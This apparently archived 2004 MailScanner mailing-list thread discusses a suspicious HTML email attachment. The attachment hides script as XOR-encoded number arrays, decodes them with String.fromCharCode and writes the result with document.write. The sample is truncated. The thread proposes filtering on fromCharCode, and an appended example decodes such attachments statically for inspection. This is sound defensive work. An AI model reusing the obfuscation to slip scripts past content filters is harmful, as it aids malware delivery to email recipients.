Possible virus in JavaScript attachment?
Rob Charles
rob at thehostmasters.com
Tue Mar 9 13:59:20 GMT 2004
I have seen at least 100 or so over the last couple weeks...
Thought it was just marketing crap, but now that you mentioned it... there
was some weird coding in it....
Rob Charles
TheHostMasters
Montreal, Canada
514-846-0006
Rob at TheHostMasters.com
http://www.TheHostMasters.com
----- Original Message -----
From: "Olivier Diserens" <olivier.diserens at FASTNET.CH>
To: <MAILSCANNER at JISCMAIL.AC.UK>
Sent: Monday, March 08, 2004 4:42 PM
Subject: Re: Possible virus in JavaScript attachment?
> Hi,
>
> I already saw this a couple of times.
> This is a way to inject some JavaScript code in a page without actually
> writing the script, but instead giving the ASCII character codes,
> thus bypassing the dangerous contents check.
> The script will itself do the translation and get back the bad script.
>
> I was thinking of a check around the fromCharCode() function. Denying
> it will block this kind of stuff. I can't see another fromCharCode-like
> function that would be useful to prevent, but I'm not a JavaScript
> expert.
>
> document.write may also be a little bit risky, no?
>
> Other ideas?
>
> best regards
> Olivier Diserens
>
>
>
> On 8 March 04, at 22:30, Jim Holland wrote:
>
> > I have come across a number of suspicious messages with subject line
> > "hi", body text "This message has an attach", and the attachment
> > "superscripted.html", which contains the following type of scripting:
> >
> > <script language="JavaScript">
> > difficulties = new Array(115,
> > 180,145,215,7,246,108,140,123,22,242,
> > . . .
> > 231,65,65,159,150,180,80,101,27,27,
> > 218);
> > bribed = new Array(79,
> > 220,229,186,107,200,97,134,71,116,157,
> > . . .
> > 80,73,78,111,124,5,90,139,104,129
> > );
> > Shelton = 1142;
> > rupee = 231;
> > var obelisk = "";
> > for(Winslow = 0; Winslow < Shelton; Winslow++)
> > obelisk = obelisk + String.fromCharCode(difficulties[Winslow] ^
> > bribed[Winslow % rupee]);
> > document.write(obelisk);
> > </script>
> >
> > These are not being blocked by MailScanner/ClamAV. I don't know any
> > JavaScript, but the above looks distinctly suspect. Does anyone know
> > what it is all about/whether it is potentially harmful? Does this
> > indicate a possible exploit that should be blocked?
> >
> > We automatically quarantine any html attachments that contain
> > scripting, but this is just done by testing using a simple grep and
> > has nothing to do with MailScanner. Are we just being paranoid? I
> > would prefer to have this done by MailScanner for consistency.
> >
> > Regards
> >
> > Jim Holland
> > System Administrator
> > MANGO - Zimbabwe's non-profit e-mail service
>
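Added example, not part of the original thread or of MailScanner: a static check for the pattern discussed above, which flags fromCharCode()/document.write and undoes the XOR of the two arrays by reading the attachment as text, without running the script. The function name `analyzeAttachment`, the sample's variable names and its harmless hidden text are constructed for illustration.

```javascript
// Constructed sample in the shape quoted above; hidden text is a harmless "<b>test</b>".
const SAMPLE = `<script language="JavaScript">
alpha = new Array(59,
72,45,115,79,96,115,22,60,101,20);
beta = new Array(7,42,19);
count = 11;
span = 3;
var out = "";
for(i = 0; i < count; i++)
out = out + String.fromCharCode(alpha[i] ^
beta[i % span]);
document.write(out);
</script>`;

// Hypothetical helper: inspects attachment text as data and never evaluates it.
function analyzeAttachment(html) {
  const findings = [];
  if (/fromCharCode\s*\(/.test(html)) findings.push('fromCharCode');
  if (/document\s*\.\s*write(ln)?\s*\(/.test(html)) findings.push('document.write');

  // Collect `name = new Array(1,2,...)` literals and `name = 123;` scalars.
  // Prototype-less maps, so a variable named "constructor" cannot confuse lookups.
  const arrays = Object.create(null), ints = Object.create(null);
  for (const m of html.matchAll(/(\w+)\s*=\s*new\s+Array\s*\(([\d\s,]*)\)/g))
    arrays[m[1]] = m[2].split(',').map(s => s.trim()).filter(Boolean).map(Number);
  for (const m of html.matchAll(/(\w+)\s*=\s*(\d+)\s*;/g)) ints[m[1]] = Number(m[2]);

  // Recognise fromCharCode(data[i] ^ key[i % period]) and undo the XOR statically.
  const x = /fromCharCode\s*\(\s*(\w+)\s*\[\s*\w+\s*\]\s*\^\s*(\w+)\s*\[\s*\w+\s*%\s*(\w+)\s*\]\s*\)/.exec(html);
  let decoded = null;
  if (x && arrays[x[1]] && arrays[x[2]]) {
    findings.push('xor-decoder');
    const data = arrays[x[1]], key = arrays[x[2]];
    const period = x[3] in ints ? ints[x[3]] : Number(x[3]);
    // Simplification: decode the whole data array rather than honouring the loop bound.
    // `| 0` mirrors how JavaScript treats an out-of-range key index in an XOR.
    decoded = data.map((v, i) => String.fromCharCode(v ^ (key[i % period] | 0))).join('');
  }
  // Flag on fromCharCode, the check proposed in the reply; the rest is context.
  return { suspicious: findings.includes('fromCharCode'), findings, decoded };
}

const report = analyzeAttachment(SAMPLE);
console.log(report.findings.join(', '), '->', JSON.stringify(report.decoded));
```

The decoded string is what the attachment would have passed to document.write, so it can be fed to the same content checks that the encoded form slipped past.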